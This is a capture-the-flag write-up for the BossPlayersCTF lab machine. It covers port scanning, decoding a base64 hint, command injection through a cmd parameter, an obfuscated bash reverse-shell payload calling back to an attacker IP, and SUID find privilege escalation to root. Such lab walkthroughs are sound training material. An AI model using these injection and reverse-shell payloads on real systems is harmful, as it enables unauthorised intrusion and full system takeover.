> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/bossplayersctf.md).

# BossPlayersCTF

## Nmap

```
sudo nmap 192.168.152.20 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 shows the following page.

![](/files/-MXTUGQymyxrWK6nK4r-)

Viewing the source code of this page reveals text at the end.

```
WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
```

We can take this string and run it through base64. We need to perform this three times to reveal a plain text string.

```
echo 'WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK' | base64 -d
echo 'ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K' |  base64 -d
echo 'd29ya2luZ2lucHJvZ3Jlc3MucGhwCg==' |  base64 -d
```

![](/files/-MXTUynfMJ97lOXUh0PP)

Browsing to workingprogress.php:

![/workingprogress.php](/files/-MXTVJrdm02jcjGBzHtq)

Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results.

![](/files/-MXTVuG4RHBHBmEF91kz)

To create a reverse shell run the following command in a terminal:

```
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

Then take the base64 output and run it as a command in the web browser.

```
http://192.168.152.20/workinginprogress.php?cmd=echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqRTFNaTg0TUNBd1BpWXhDZz09Cg==|ba%27%27se%27%276%27%274${IFS}-%27%27d|ba%27%27se%27%2764${IFS}-%27%27d|b%27%27a%27%27s%27%27h
```

This will create a reverse shell connection on our `netcat` listener.

![](/files/-MXTWaj1T789G1mV_JQg)

I then transferred `linpeas` over from my attacking machine. Shortly after running linpeas finds that the binary 'find' has the SUID bit set.

Checking this against [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) shows we can use this to gain a root shell.

![](/files/-MXT_MgC32c26EKQ1pk_)

Run the following command to spawn a root shell:

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

![](/files/-MXT_YbgY2sfxgmXV16J)
